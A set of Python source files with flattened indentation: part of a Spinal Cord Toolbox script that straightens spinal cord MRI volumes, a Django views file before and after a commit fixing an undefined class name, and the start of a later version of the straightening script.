print ' Final interpolation ............... '+interpolation_warp
print ' Verbose ........................... '+str(verbose)
print ''
# if verbose 2, import matplotlib
if verbose == 2:
import matplotlib.pyplot as plt
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp)
sct.run('cp '+fname_centerline+' '+path_tmp)
# go to tmp folder
os.chdir(path_tmp)
# Open centerline
#==========================================================================================
# Change orientation of the input centerline into RPI
print '\nOrient centerline to RPI orientation...'
fname_centerline_orient = 'tmp.centerline_rpi' + ext_centerline
sct.run('sct_orientation -i ' + file_centerline + ext_centerline + ' -o ' + fname_centerline_orient + ' -orientation RPI')
print '\nGet dimensions of input centerline...'
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
print '.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz)
print '.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm'
print '\nOpen centerline volume...'
file = nibabel.load(fname_centerline_orient)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
x_centerline = [0 for iz in range(0, nz, 1)]
y_centerline = [0 for iz in range(0, nz, 1)]
z_centerline = [iz for iz in range(0, nz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz, 1)]
# Two possible scenario:
# 1. the centerline is probabilistic: each slice contains voxels with the probability of containing the centerline [0:...:1]
# We only take the maximum value of the image to aproximate the centerline.
# 2. The centerline/segmentation image contains many pixels per slice with values {0,1}.
# We take all the points and approximate the centerline on all these points.
x_seg_start, y_seg_start = (data[:,:,0]>0).nonzero()
x_seg_end, y_seg_end = (data[:,:,-1]>0).nonzero()
# check if centerline covers all the image
if len(x_seg_start)==0 or len(x_seg_end)==0:
print '\nERROR: centerline/segmentation must cover all "z" slices of the input image.\n' \
'To solve the problem, you need to crop the input image (you can use \'sct_crop_image\') and generate one' \
'more time the spinal cord centerline/segmentation from this cropped image.\n'
usage()
# X, Y, Z = ((data<1)*(data>0)).nonzero() # X is empty if binary image
# if (len(X) > 0): # Scenario 1
# for iz in range(0, nz, 1):
# x_centerline[iz], y_centerline[iz] = numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape)
# else: # Scenario 2
# for iz in range(0, nz, 1):
# x_seg, y_seg = (data[:,:,iz]>0).nonzero()
# x_centerline[iz] = numpy.mean(x_seg)
# y_centerline[iz] = numpy.mean(y_seg)
# # TODO: find a way to do the previous loop with this, which is more neat:
# # [numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape) for iz in range(0,nz,1)]
# get center of mass of the centerline/segmentation
print '\nGet center of mass of the centerline/segmentation...'
for iz in range(0, nz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(numpy.array(data[:,:,iz]))
# clear variable
del data
# Fit the centerline points with the kind of curve given as argument of the script and return the new fitted coordinates
if centerline_fitting == 'splines':
x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_centerline(x_centerline,y_centerline,z_centerline)
elif centerline_fitting == 'polynomial':
x_centerline_fit, y_centerline_fit, polyx, polyy = polynome_centerline(x_centerline,y_centerline,z_centerline)
if verbose == 2:
# plot centerline
ax = plt.subplot(1,2,1)
plt.plot(x_centerline, z_centerline, 'b:', label='centerline')
plt.plot(x_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('x')
plt.ylabel('z')
ax = plt.subplot(1,2,2)
plt.plot(y_centerline, z_centerline, 'b:', label='centerline')
plt.plot(y_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('y')
plt.ylabel('z')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
plt.show()
# Get coordinates of landmarks along curved centerline
#==========================================================================================
print '\nGet coordinates of landmarks along curved centerline...'
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy.
# find derivative of polynomial
step_z = round(nz/gapz)
#iz_curved = [i for i in range (0, nz, gapz)]
iz_curved = [i*step_z for i in range (0, gapz)]
iz_curved.append(nz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
landmark_curved = [ [ [ 0 for i in range(0,3)] for i in range(0,5) ] for i in iz_curved ]
# print x_centerline_deriv,len(x_centerline_deriv)
# landmark[a][b][c]
# a: index along z. E.g., the first cross with have index=0, the next index=1, and so on...
# b: index of element on the cross. I.e., 0: center of the cross, 1: +x, 2 -x, 3: +y, 4: -y
# c: dimension, i.e., 0: x, 1: y, 2: z
# loop across index, which corresponds to iz (points along the centerline)
if centerline_fitting=='polynomial':
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set x and z coordinates for landmarks +x and -x
landmark_curved[index][1][2], landmark_curved[index][1][0], landmark_curved[index][2][2], landmark_curved[index][2][0] = get_points_perpendicular_to_curve(polyx, polyx.deriv(), iz_curved[index], gapxy)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
landmark_curved[index][3][2], landmark_curved[index][3][1], landmark_curved[index][4][2], landmark_curved[index][4][1] = get_points_perpendicular_to_curve(polyy, polyy.deriv(), iz_curved[index], gapxy)
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
elif centerline_fitting=='splines':
for index in range(0, n_iz_curved, 1):
# calculate d (ax+by+cz+d=0)
# print iz_curved[index]
a=x_centerline_deriv[iz_curved[index]]
b=y_centerline_deriv[iz_curved[index]]
c=z_centerline_deriv[iz_curved[index]]
x=x_centerline_fit[iz_curved[index]]
y=y_centerline_fit[iz_curved[index]]
z=iz_curved[index]
d=-(a*x+b*y+c*z)
#print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n=Symbol('x_n')
landmark_curved[index][2][0],landmark_curved[index][1][0]=solve((x_n-x)**2+((-1/c)*(a*x_n+b*y+d)-z)**2-gapxy**2,x_n) #x for -x and +x
landmark_curved[index][1][2]=(-1/c)*(a*landmark_curved[index][1][0]+b*y+d) #z for +x
landmark_curved[index][2][2]=(-1/c)*(a*landmark_curved[index][2][0]+b*y+d) #z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n=Symbol('y_n')
landmark_curved[index][4][1],landmark_curved[index][3][1]=solve((y_n-y)**2+((-1/c)*(a*x+b*y_n+d)-z)**2-gapxy**2,y_n) #y for -y and +y
landmark_curved[index][3][2]=(-1/c)*(a*x+b*landmark_curved[index][3][1]+d)#z for +y
landmark_curved[index][4][2]=(-1/c)*(a*x+b*landmark_curved[index][4][1]+d)#z for -y
# #display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'g')
# ax.plot(x_centerline, y_centerline,z_centerline, 'r')
# ax.plot([landmark_curved[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
# Get coordinates of landmarks along straight centerline
#==========================================================================================
print '\nGet coordinates of landmarks along straight centerline...'
landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
iz_straight = [0 for i in range (0,gapz+1)]
#print iz_straight,len(iz_straight)
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
iz_curved[index] - iz_curved[index-1]]
# compute norm of this vector
norm_vector_centerline = numpy.linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline,0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_straight[index][0][0], landmark_straight[index][0][1], landmark_straight[index][0][2] = x0, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +x
landmark_straight[index][1][0], landmark_straight[index][1][1], landmark_straight[index][1][2] = x0 + gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks -x
landmark_straight[index][2][0], landmark_straight[index][2][1], landmark_straight[index][2][2] = x0-gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +y
landmark_straight[index][3][0], landmark_straight[index][3][1], landmark_straight[index][3][2] = x0, y0+gapxy, iz_straight[index]
# set x, y and z coordinates for landmarks -y
landmark_straight[index][4][0], landmark_straight[index][4][1], landmark_straight[index][4][2] = x0, y0-gapxy, iz_straight[index]
# # display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'r')
# ax.plot([landmark_straight[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
#
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
print '\nPad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV...'
sct.run('c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz')
# TODO: don't pad input volume: no need for that! instead, try to increase size of hdr when saving landmarks.
# Open padded centerline for reading
print '\nOpen padded centerline for reading...'
file = nibabel.load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# initialize landmark value
landmark_value = 1
# Loop across cross index
for index in range(0, n_iz_curved, 1):
# loop across cross element index
for i_element in range(0, 5, 1):
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved[index][i_element][0])), int(round(landmark_curved[index][i_element][1])), int(round(landmark_curved[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index][i_element][0])), int(round(landmark_straight[index][i_element][1])), int(round(landmark_straight[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# increment landmark value
landmark_value = landmark_value + 1
# Write NIFTI volumes
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
print '\nWrite NIFTI volumes...'
img = nibabel.Nifti1Image(data_curved_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_curved.nii.gz')
print '.. File created: tmp.landmarks_curved.nii.gz'
img = nibabel.Nifti1Image(data_straight_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_straight.nii.gz')
print '.. File created: tmp.landmarks_straight.nii.gz'
# Estimate deformation field by pairing landmarks
#==========================================================================================
# Dilate landmarks (because nearest neighbour interpolation will be later used, therefore some landmarks may "disapear" if they are single points)
#print '\nDilate landmarks...'
#sct.run(fsloutput+'fslmaths tmp.landmarks_curved.nii -kernel box 3x3x3 -dilD tmp.landmarks_curved_dilated -odt short')
#sct.run(fsloutput+'fslmaths tmp.landmarks_straight.nii -kernel box 3x3x3 -dilD tmp.landmarks_straight_dilated -odt short')
# Estimate rigid transformation
print '\nEstimate rigid transformation between paired landmarks...'
sct.run('ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt')
# Apply rigid transformation
print '\nApply rigid transformation to curved landmarks...'
sct.run('WarpImageMultiTransform 3 tmp.landmarks_curved.nii.gz tmp.landmarks_curved_rigid.nii.gz -R tmp.landmarks_straight.nii.gz tmp.curve2straight_rigid.txt --use-NN')
# Estimate b-spline transformation curve --> straight
print '\nEstimate b-spline transformation: curve --> straight...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
print('>> '+cmd)
commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
print '\nEstimate b-spline transformation: straight --> curve...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R tmp.landmarks_straight.nii.gz -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
print('>> '+cmd)
commands.getstatusoutput(cmd)
#print '\nPad input image...'
#sct.run('c3d '+fname_anat+' -pad '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox 0 -o tmp.anat_pad.nii')
# Unpad landmarks...
# THIS WAS REMOVED ON 2014-06-03 because the output data was cropped at the edge, which caused landmarks to sometimes disappear
# print '\nUnpad landmarks...'
# sct.run('fslroi tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz '+str(padding)+' '+str(nx)+' '+str(padding)+' '+str(ny)+' '+str(padding)+' '+str(nz))
# Apply deformation to input image
print '\nApply transformation to input image...'
sct.run('WarpImageMultiTransform 3 '+file_anat+ext_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# sct.run('WarpImageMultiTransform 3 '+fname_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight_crop.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# come back to parent folder
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
print '\nGenerate output file (in current folder)...'
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz','','warp_curve2straight',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz','','warp_straight2curve',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz','',file_anat+'_straight',ext_anat) # straightened anatomic
# Remove temporary files
if remove_temp_files == 1:
print('\nRemove temporary files...')
sct.run('rm -rf '+path_tmp)
print '\nDone!\n'
#=======================================================================================================================
# get_points_perpendicular_to_curve
#=======================================================================================================================
# output: x1, y1, x2, y2
def get_points_perpendicular_to_curve(poly, dpoly, x, gap):
# get a: slope of the line perpendicular to the tangent of the curve at a specific point
if dpoly(x) != 0:
a = -1/dpoly(x)
else:
print 'TODO: case of null derivative'
# get y: ordinate that intersects the curve and the line
y = poly(x)
# convert slope to radian
a_rad = numpy.arctan(a)
# get coordinates of the two points on the line at a distance "gap" from the curve
x1 = x + ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
y1 = y + ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
x2 = x - ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
y2 = y - ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
return x1, y1, x2, y2
#=======================================================================================================================
# B-Spline fitting
#=======================================================================================================================
def b_spline_centerline(x_centerline,y_centerline,z_centerline):
"""Give a better fitting of the centerline than the method 'spline_centerline' using b-splines"""
print '\nFit centerline using B-spline approximation'
points = [[x_centerline[n], y_centerline[n], z_centerline[n]] for n in range(len(x_centerline))]
nurbs = NURBS(3, 3000, points) # BE very careful with the spline order that you choose : if order is too high ( > 4 or 5) you need to set a higher number of Control Points (cf sct_nurbs ). For the third argument (number of points), give at least len(z_centerline)+500 or higher
P = nurbs.getCourbe3D()
x_centerline_fit = P[0]
y_centerline_fit = P[1]
Q = nurbs.getCourbe3D_deriv()
x_centerline_deriv = Q[0]
y_centerline_deriv = Q[1]
z_centerline_deriv = Q[2]
return x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
#=======================================================================================================================
# Polynomial fitting
#=======================================================================================================================
def polynome_centerline(x_centerline,y_centerline,z_centerline):
"""Fit polynomial function through centerline"""
# Fit centerline in the Z-X plane using polynomial function
print '\nFit centerline in the Z-X plane using polynomial function...'
coeffsx = numpy.polyfit(z_centerline, x_centerline, deg=param.deg_poly)
polyx = numpy.poly1d(coeffsx)
x_centerline_fit = numpy.polyval(polyx, z_centerline)
#Fit centerline in the Z-Y plane using polynomial function
print '\nFit centerline in the Z-Y plane using polynomial function...'
coeffsy = numpy.polyfit(z_centerline, y_centerline, deg=param.deg_poly)
polyy = numpy.poly1d(coeffsy)
y_centerline_fit = numpy.polyval(polyy, z_centerline)
return x_centerline_fit,y_centerline_fit,polyx,polyy
#=======================================================================================================================
# usage
#=======================================================================================================================
def usage():
print '\n' \
''+os.path.basename(__file__)+'\n' \
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n' \
'Part of the Spinal Cord Toolbox <https://sourceforge.net/projects/spinalcordtoolbox>\n' \
'\n'\
'DESCRIPTION\n' \
' This function straightens the spinal cord using its centerline (or segmentation).\n' \
'\n'\
'USAGE\n' \
' '+os.path.basename(__file__)+' -i <data> -c <centerline>\n' \
'\n'\
'MANDATORY ARGUMENTS\n' \
' -i input volume.\n' \
' -c centerline or segmentation. Centerline must cover each "z" slices.\n' \
'\n'\
'OPTIONAL ARGUMENTS\n' \
' -p <padding> amount of padding for generating labels. Default='+str(param.padding)+'\n' \
' -f {splines,polynomial} Method used to fit the centerline (or segmentation). Default='+str(param.fitting_method)+'\n' \
' -w {nearestneighbor,trilinear,spline} Final interpolation. Default='+str(param.interpolation_warp)+'\n' \
' -r {0,1} remove temporary files. Default='+str(param.remove_temp_files)+'\n' \
' -v {0,1,2} verbose. 0: nothing, 1: txt, 2: txt+fig. Default='+str(param.verbose)+'\n' \
' -h help. Show this message.\n' \
'\n'\
'EXAMPLE:\n' \
' sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz\n'
sys.exit(2)
#=======================================================================================================================
# Start program
#=======================================================================================================================
if __name__ == "__main__":
# initialize parameters
param = param()
# call main function
main()
|
from django.conf import settings
from django.http.response import Http404
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, DetailView, UpdateView
from .models import SoftwareCollection
from .forms import CreateForm, UpdateForm
from django.template import RequestContext
from tagging.models import Tag
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
def _list(request, template, queryset, dictionary, **kwargs):
filter_params = {}
# TODO add filtering
dictionary['collections'] = queryset.filter(**filter_params)
return render_to_response(template, dictionary,
context_instance = RequestContext(request))
def list_all(request, **kwargs):
queryset = SoftwareCollection.objects
return _list(request, 'scls/list_all.html', queryset, {}, **kwargs)
@login_required
def list_my(request, **kwargs):
queryset = request.user.softwarecollection_set
return _list(request, 'scls/list_my.html', queryset, {}, **kwargs)
def list_user(request, username, **kwargs):
User = get_user_model()
user = get_object_or_404(User, **{User.USERNAME_FIELD: username})
queryset = user.softwarecollection_set
dictionary = {'user': user}
return _list(request, 'scls/list_user.html', queryset, dictionary, **kwargs)
def list_tag(request, name, **kwargs):
try:
tag = Tag.objects.get(name=name)
except:
tag = Tag()
tag.name = name
queryset = SoftwareCollection.tagged.with_all(tag)
dictionary = {'tag': tag}
return _list(request, 'scls/list_tag.html', queryset, dictionary, **kwargs)
class Detail(DetailView):
model = SoftwareCollection
context_object_name = 'scl'
detail = Detail.as_view()
class New(CreateView):
model = SoftwareCollection
template_name_suffix = '_new'
def get_form_class(self):
return CreateForm
def form_valid(self, form):
"""
If the form is valid, save the associated model.
"""
self.object = form.save(commit=False)
self.object.maintainer = self.request.user
self.object.save()
return super(New, self).form_valid(form)
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProtectedView, self).dispatch(*args, **kwargs)
new = New.as_view()
class Edit(UpdateView):
model = SoftwareCollection
template_name_suffix = '_edit'
def get_object(self, *args, **kwargs):
scl = super(Edit, self).get_object(*args, **kwargs)
if scl.has_perm(self.request.user, 'edit'):
return scl
else:
raise PermissionDenied()
def get_form_class(self):
return UpdateForm
edit = Edit.as_view()
use correct class name
addressing TB:
global name 'ProtectedView' is not defined
from django.conf import settings
from django.http.response import Http404
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, DetailView, UpdateView
from .models import SoftwareCollection
from .forms import CreateForm, UpdateForm
from django.template import RequestContext
from tagging.models import Tag
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
def _list(request, template, queryset, dictionary, **kwargs):
filter_params = {}
# TODO add filtering
dictionary['collections'] = queryset.filter(**filter_params)
return render_to_response(template, dictionary,
context_instance = RequestContext(request))
def list_all(request, **kwargs):
queryset = SoftwareCollection.objects
return _list(request, 'scls/list_all.html', queryset, {}, **kwargs)
@login_required
def list_my(request, **kwargs):
queryset = request.user.softwarecollection_set
return _list(request, 'scls/list_my.html', queryset, {}, **kwargs)
def list_user(request, username, **kwargs):
User = get_user_model()
user = get_object_or_404(User, **{User.USERNAME_FIELD: username})
queryset = user.softwarecollection_set
dictionary = {'user': user}
return _list(request, 'scls/list_user.html', queryset, dictionary, **kwargs)
def list_tag(request, name, **kwargs):
try:
tag = Tag.objects.get(name=name)
except:
tag = Tag()
tag.name = name
queryset = SoftwareCollection.tagged.with_all(tag)
dictionary = {'tag': tag}
return _list(request, 'scls/list_tag.html', queryset, dictionary, **kwargs)
class Detail(DetailView):
model = SoftwareCollection
context_object_name = 'scl'
detail = Detail.as_view()
class New(CreateView):
model = SoftwareCollection
template_name_suffix = '_new'
def get_form_class(self):
return CreateForm
def form_valid(self, form):
"""
If the form is valid, save the associated model.
"""
self.object = form.save(commit=False)
self.object.maintainer = self.request.user
self.object.save()
return super(New, self).form_valid(form)
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(New, self).dispatch(*args, **kwargs)
new = New.as_view()
class Edit(UpdateView):
model = SoftwareCollection
template_name_suffix = '_edit'
def get_object(self, *args, **kwargs):
scl = super(Edit, self).get_object(*args, **kwargs)
if scl.has_perm(self.request.user, 'edit'):
return scl
else:
raise PermissionDenied()
def get_form_class(self):
return UpdateForm
edit = Edit.as_view()
|
#!/usr/bin/env python
#
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-09-01
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
from msct_parser import Parser
from sct_label_utils import ProcessLabels
from sct_crop_image import ImageCropper
from nibabel import load, Nifti1Image, save
from numpy import array, asarray, append, insert, linalg, mean, sum, isnan
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
from sct_apply_transfo import Transform
import sct_utils as sct
from msct_smooth import smoothing_window, evaluate_derivative_3D
from sct_orientation import set_orientation
from msct_types import Coordinate
import copy_reg
import types
def _pickle_method(method):
"""
Author: Steven Bethard (author of argparse)
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
cls_name = ''
if func_name.startswith('__') and not func_name.endswith('__'):
cls_name = cls.__name__.lstrip('_')
if cls_name:
func_name = '_' + cls_name + func_name
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
"""
Author: Steven Bethard
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
def smooth_centerline(fname_centerline, algo_fitting='hanning', type_window='hanning', window_length=80, verbose=0):
"""
:param fname_centerline: centerline in RPI orientation
:return: a bunch of useful stuff
"""
# window_length = param.window_length
# type_window = param.type_window
# algo_fitting = param.algo_fitting
sct.printv('\nSmooth centerline/segmentation...', verbose)
# get dimensions (again!)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline)
# open centerline
file = load(fname_centerline)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
# N.B. len(z_centerline) = nz_nonz can be smaller than nz in case the centerline is smaller than the input volume
z_centerline = [iz for iz in range(0, nz, 1) if data[:, :, iz].any()]
nz_nonz = len(z_centerline)
x_centerline = [0 for iz in range(0, nz_nonz, 1)]
y_centerline = [0 for iz in range(0, nz_nonz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
# get center of mass of the centerline/segmentation
sct.printv('.. Get center of mass of the centerline/segmentation...', verbose)
for iz in range(0, nz_nonz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(array(data[:, :, z_centerline[iz]]))
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax = fig.add_subplot(111)
# data_tmp = data
# data_tmp[x_centerline[iz], y_centerline[iz], z_centerline[iz]] = 10
# implot = ax.imshow(data_tmp[:, :, z_centerline[iz]].T)
# implot.set_cmap('gray')
# plt.show()
sct.printv('.. Smoothing algo = '+algo_fitting, verbose)
if algo_fitting == 'hanning':
# 2D smoothing
sct.printv('.. Windows length = '+str(window_length), verbose)
# change to array
x_centerline = asarray(x_centerline)
y_centerline = asarray(y_centerline)
# Smooth the curve
x_centerline_smooth = smoothing_window(x_centerline, window_len=window_length/pz, window=type_window, verbose = verbose)
y_centerline_smooth = smoothing_window(y_centerline, window_len=window_length/pz, window=type_window, verbose = verbose)
# convert to list final result
x_centerline_smooth = x_centerline_smooth.tolist()
y_centerline_smooth = y_centerline_smooth.tolist()
# clear variable
del data
x_centerline_fit = x_centerline_smooth
y_centerline_fit = y_centerline_smooth
z_centerline_fit = z_centerline
# get derivative
x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = evaluate_derivative_3D(x_centerline_fit, y_centerline_fit, z_centerline, px, py, pz)
x_centerline_fit = asarray(x_centerline_fit)
y_centerline_fit = asarray(y_centerline_fit)
